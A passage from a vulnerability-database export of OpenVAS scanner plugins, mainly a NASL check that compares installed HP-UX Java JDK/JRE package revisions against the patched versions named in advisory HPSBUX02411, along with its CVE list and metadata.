revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", 
rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", 
revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", 
rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", 
revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "Check for the Version of Java", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835195", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835195", "type": "openvas", "title": "HP-UX Update for Java HPSBUX02411", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02411\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Multiple remote vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.02 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.14 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.20 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities may allow remote unauthorized access, privilege escalation, \n execution of arbitrary code, and creation of a Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01683026-2\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835195\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02411\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", 
\"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_name( \"HP-UX Update for Java HPSBUX02411\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", 
rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", 
